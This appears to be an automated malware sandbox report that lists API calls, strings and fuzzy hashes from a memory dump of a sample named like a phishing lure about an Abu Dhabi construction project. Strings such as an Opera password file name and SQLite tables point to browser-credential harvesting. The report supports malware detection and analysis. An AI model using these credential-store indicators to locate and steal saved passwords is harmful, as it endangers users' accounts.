                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ItemMessageSend$CreateFontIndirectmemsetwcscpy
                                                                                                                          • String ID: MS Sans Serif
                                                                                                                          • API String ID: 210187428-168460110
                                                                                                                          • Opcode ID: d52be591b3ab58c36f6074870949877e32a333ebc1fa33980d7036594a0e8467
                                                                                                                          • Instruction ID: 44e142790c58e2983bb51e892a2c7280827b5342727586ee11fe1c2be2fb852b
                                                                                                                          • Opcode Fuzzy Hash: d52be591b3ab58c36f6074870949877e32a333ebc1fa33980d7036594a0e8467
                                                                                                                          • Instruction Fuzzy Hash: 7CF082B5A4030877EB326BA1DC46F9A77BDBB44B01F040935F721B91D1D3F4A585C658
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ClassName_wcsicmpmemset
                                                                                                                          • String ID: edit
                                                                                                                          • API String ID: 2747424523-2167791130
                                                                                                                          • Opcode ID: da8fee05c6b158577436834c58d8e0793f5841ead652fa3e76a227b487c5742d
                                                                                                                          • Instruction ID: aa36152fd255268de381ae2120198bffa1fffac517830ea88c39a2b7b5867ff0
                                                                                                                          • Opcode Fuzzy Hash: da8fee05c6b158577436834c58d8e0793f5841ead652fa3e76a227b487c5742d
                                                                                                                          • Instruction Fuzzy Hash: 86E0D872D8031E6AFB10EBA0DC4AFA977BCFB01708F0001B6B915E10C2EBB496494A45
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                            • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                                                            • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                            • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                                          • GetProcAddress.KERNEL32(00000000,shlwapi.dll), ref: 00414E2B
                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,00405751,00000000), ref: 00414E43
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                                                                          • String ID: SHAutoComplete$shlwapi.dll
                                                                                                                          • API String ID: 3150196962-1506664499
                                                                                                                          • Opcode ID: cdcb965da711456ca4b51fb43941328c5d6cb5423f9048b51d1f1fd4f659d43f
                                                                                                                          • Instruction ID: 56be8aed7d941f739c6f69dc747e21d8edf2639efa9d7e462eda1ee05908af23
                                                                                                                          • Opcode Fuzzy Hash: cdcb965da711456ca4b51fb43941328c5d6cb5423f9048b51d1f1fd4f659d43f
                                                                                                                          • Instruction Fuzzy Hash: C1D0C2353002315BD6616B27AC04AAF2A99EFC13A1B054035F928D2210DBA84996827D
                                                                                                                          APIs
                                                                                                                          • memcpy.MSVCRT(?,00000000,00000030,00000000), ref: 0041D8A6
                                                                                                                          • memcpy.MSVCRT(?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041D8BC
                                                                                                                          • memcmp.MSVCRT(?,?,00000030,?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041D8CB
                                                                                                                          • memcmp.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,00000000), ref: 0041D913
                                                                                                                          • memcpy.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0041D92E
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: memcpy$memcmp
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3384217055-0
                                                                                                                          • Opcode ID: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                                                                                                          • Instruction ID: f5df6941464580ef2fdae31f27b7f31021858bb2d0e37ec30fcb1df3a02010a9
                                                                                                                          • Opcode Fuzzy Hash: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                                                                                                          • Instruction Fuzzy Hash: 8821B2B2E10249ABDB14EA91DC46EDF73FC9B44704F01442AF512D7181EB28E644C725
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: memset$memcpy
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 368790112-0
                                                                                                                          • Opcode ID: 8ce092fd9a5e59041eb9f85ad4e05697c1cc0ba7cb52d02734991e9cdc0d3c07
                                                                                                                          • Instruction ID: abb90bdd0bd5c960a46cc99acd1c91865272cbbdb433919b32c204757dd19146
                                                                                                                          • Opcode Fuzzy Hash: 8ce092fd9a5e59041eb9f85ad4e05697c1cc0ba7cb52d02734991e9cdc0d3c07
                                                                                                                          • Instruction Fuzzy Hash: 0201FCB5740B007BF235AB35CC03F9A73A8AF52724F004A1EF153966C2DBF8A554819D
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 004019D8: GetMenu.USER32(?), ref: 004019F6
                                                                                                                            • Part of subcall function 004019D8: GetSubMenu.USER32(00000000), ref: 004019FD
                                                                                                                            • Part of subcall function 004019D8: EnableMenuItem.USER32(?,?,00000000), ref: 00401A15
                                                                                                                            • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000412,?,00000000), ref: 00401A36
                                                                                                                            • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000411,?,?), ref: 00401A5A
                                                                                                                          • GetMenu.USER32(?), ref: 00410F8D
                                                                                                                          • GetSubMenu.USER32(00000000), ref: 00410F9A
                                                                                                                          • GetSubMenu.USER32(00000000), ref: 00410F9D
                                                                                                                          • CheckMenuRadioItem.USER32(00000000,0000B284,0000B287,?,00000000), ref: 00410FA9
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Menu$ItemMessageSend$CheckEnableRadio
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1889144086-0
                                                                                                                          • Opcode ID: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
                                                                                                                          • Instruction ID: be5000c07a60ff25a23af51018491178d5f127676f18bd69b4cc56e9e4830f27
                                                                                                                          • Opcode Fuzzy Hash: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
                                                                                                                          • Instruction Fuzzy Hash: D5517171B40704BFEB20AB66CD4AF9FBAB9EB44704F00046EB249B72E2C6756D50DB54
                                                                                                                          APIs
                                                                                                                          • CreateFileMappingW.KERNEL32(?,00000000,00000004,00000000,?,00000000), ref: 004180B8
                                                                                                                          • MapViewOfFile.KERNEL32(00000000,00000006,00000000,?,?), ref: 004180E3
                                                                                                                          • GetLastError.KERNEL32 ref: 0041810A
                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00418120
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: File$CloseCreateErrorHandleLastMappingView
                                                                                                                          • String ID:
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00415A91: memset.MSVCRT ref: 00415AAB
                                                                                                                          • memcpy.MSVCRT(?,?,?), ref: 0042EC7A
                                                                                                                          Strings
                                                                                                                          • sqlite_altertab_%s, xrefs: 0042EC4C
                                                                                                                          • virtual tables may not be altered, xrefs: 0042EBD2
                                                                                                                          • Cannot add a column to a view, xrefs: 0042EBE8
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID: memcpymemset
                                                                                                                          • String ID: Cannot add a column to a view$sqlite_altertab_%s$virtual tables may not be altered
                                                                                                                          APIs
                                                                                                                          • memset.MSVCRT ref: 0040560C
                                                                                                                            • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
                                                                                                                            • Part of subcall function 0040D134: LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
                                                                                                                            • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002), ref: 0040D24C
                                                                                                                            • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                            • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                                            • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
                                                                                                                            • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                                                                                            • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                                                                                            • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                                                                                            • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                                                                            • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                                                                            • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                                                                            • Part of subcall function 0040A212: wcscpy.MSVCRT ref: 0040A269
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                                                                                          • String ID: *.*$dat$wand.dat
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT(00000000,?,00000000,?,00410C56,?), ref: 0040ECF9
                                                                                                                            • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000,?,00410C56,?), ref: 0040EDC0
                                                                                                                          • wcslen.MSVCRT ref: 00410C74
                                                                                                                          • _wtoi.MSVCRT(?,?,00000000,00000000,00000000,?,00000000), ref: 00410C80
                                                                                                                          • _wcsicmp.MSVCRT ref: 00410CCE
                                                                                                                          • _wcsicmp.MSVCRT ref: 00410CDF
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID: _wcsicmp$??2@??3@_wtoiwcslen
                                                                                                                          • String ID:
                                                                                                                          APIs
                                                                                                                          • memset.MSVCRT ref: 00412057
                                                                                                                            • Part of subcall function 0040A116: ShellExecuteW.SHELL32(?,open,?,Function_0004E518,Function_0004E518,00000005), ref: 0040A12C
                                                                                                                          • SendMessageW.USER32(00000000,00000423,00000000,00000000), ref: 004120C7
                                                                                                                          • GetMenuStringW.USER32(?,00000103,?,0000004F,00000000), ref: 004120E1
                                                                                                                          • GetKeyState.USER32(00000010), ref: 0041210D
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID: ExecuteMenuMessageSendShellStateStringmemset
                                                                                                                          • String ID:
                                                                                                                          APIs
                                                                                                                          • free.MSVCRT ref: 0040F561
                                                                                                                          • memcpy.MSVCRT(00000000,?,00000001,g4@,00000000,0000121C,?,?,?,00403467), ref: 0040F573
                                                                                                                          • memcpy.MSVCRT(00000000,?,?,00000000), ref: 0040F5A6
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID: memcpy$free
                                                                                                                          • String ID: g4@
                                                                                                                          APIs
                                                                                                                          • memcpy.MSVCRT(?,?,00000040,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 004129CF
                                                                                                                          • memcpy.MSVCRT(?,?,00000040,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 004129F9
                                                                                                                          • memcpy.MSVCRT(?,?,00000013,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 00412A1D
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID: memcpy
                                                                                                                          • String ID: @
                                                                                                                          APIs
                                                                                                                          • ??2@YAPAXI@Z.MSVCRT(00000000,?,?,00401516,?,?,?,?,00457660,0000000C), ref: 0040AF07
                                                                                                                          • memset.MSVCRT ref: 0040AF18
                                                                                                                          • memcpy.MSVCRT(0045A474,?,00000000,00000000,00000000,00000000,00000000,?,?,00401516,?,?,?,?,00457660,0000000C), ref: 0040AF24
                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 0040AF31
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID: ??2@??3@memcpymemset
                                                                                                                          • String ID:
                                                                                                                          APIs
                                                                                                                          • memset.MSVCRT ref: 004144E7
                                                                                                                            • Part of subcall function 0040A353: _snwprintf.MSVCRT ref: 0040A398
                                                                                                                            • Part of subcall function 0040A353: memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
                                                                                                                          • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00414510
                                                                                                                          • memset.MSVCRT ref: 0041451A
                                                                                                                          • GetPrivateProfileStringW.KERNEL32(?,?,Function_0004E518,?,00002000,?), ref: 0041453C
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1127616056-0
                                                                                                                          APIs
                                                                                                                          • memcpy.MSVCRT(?,?,00000068,sqlite_master), ref: 0042FEC6
                                                                                                                          • memset.MSVCRT ref: 0042FED3
                                                                                                                          • memcpy.MSVCRT(?,?,00000068,?,?,?,00000000,?,?,?,?,?,?,?,sqlite_master), ref: 0042FF04
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: memcpy$memset
                                                                                                                          • String ID: sqlite_master
                                                                                                                          • API String ID: 438689982-3163232059
                                                                                                                          APIs
                                                                                                                          • SHGetMalloc.SHELL32(?), ref: 00414D9A
                                                                                                                          • SHBrowseForFolderW.SHELL32(?), ref: 00414DCC
                                                                                                                          • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00414DE0
                                                                                                                          • wcscpy.MSVCRT ref: 00414DF3
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: BrowseFolderFromListMallocPathwcscpy
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3917621476-0
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
                                                                                                                            • Part of subcall function 0040D134: LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
                                                                                                                            • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002), ref: 0040D24C
                                                                                                                          • _snwprintf.MSVCRT ref: 00410FE1
                                                                                                                          • SendMessageW.USER32(?,0000040B,00000000,?), ref: 00411046
                                                                                                                            • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                            • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                                            • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
                                                                                                                          • _snwprintf.MSVCRT ref: 0041100C
                                                                                                                          • wcscat.MSVCRT ref: 0041101F
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: HandleModule_snwprintf$LoadMessageSendStringmemcpywcscatwcscpywcslen
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 822687973-0
                                                                                                                          APIs
                                                                                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,74DEDF80,?,0041755F,?), ref: 00417452
                                                                                                                          • malloc.MSVCRT ref: 00417459
                                                                                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,74DEDF80,?,0041755F,?), ref: 00417478
                                                                                                                          • free.MSVCRT ref: 0041747F
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ByteCharMultiWide$freemalloc
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2605342592-0
                                                                                                                          APIs
                                                                                                                          • GetModuleHandleW.KERNEL32(00000000,?,00000000), ref: 00412403
                                                                                                                          • RegisterClassW.USER32(00000001), ref: 00412428
                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 0041242F
                                                                                                                          • CreateWindowExW.USER32(00000000,00000000,0044E518,00CF0000,00000000,00000000,00000280,000001E0,00000000,00000000,00000000,?), ref: 00412455
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: HandleModule$ClassCreateRegisterWindow
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2678498856-0
                                                                                                                          APIs
                                                                                                                          • GetDlgItem.USER32(?,?), ref: 00409B40
                                                                                                                          • SendMessageW.USER32(00000000,00000146,00000000,00000000), ref: 00409B58
                                                                                                                          • SendMessageW.USER32(00000000,00000150,00000000,00000000), ref: 00409B6E
                                                                                                                          • SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00409B91
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSend$Item
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3888421826-0
                                                                                                                          APIs
                                                                                                                          • memset.MSVCRT ref: 00417B7B
                                                                                                                          • UnlockFileEx.KERNEL32(?,00000000,?,00000000,?), ref: 00417B9B
                                                                                                                          • LockFileEx.KERNEL32(?,00000001,00000000,?,00000000,?), ref: 00417BA7
                                                                                                                          • GetLastError.KERNEL32 ref: 00417BB5
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: File$ErrorLastLockUnlockmemset
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3727323765-0
                                                                                                                          APIs
                                                                                                                          • memset.MSVCRT ref: 0040F673
                                                                                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,00007FFF,00000000,00000000,00000000), ref: 0040F690
                                                                                                                          • strlen.MSVCRT ref: 0040F6A2
                                                                                                                          • WriteFile.KERNEL32(00000001,?,00000000,00000000,00000000), ref: 0040F6B3
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2754987064-0
                                                                                                                          APIs
                                                                                                                          • memset.MSVCRT ref: 0040F6E2
                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000001,000000FF,?,00001FFF,00000000,00000000,00000001,0044E5FC,00000000,00000000,00000000,?,00000000,00000000), ref: 0040F6FB
                                                                                                                          • strlen.MSVCRT ref: 0040F70D
                                                                                                                          • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0040F71E
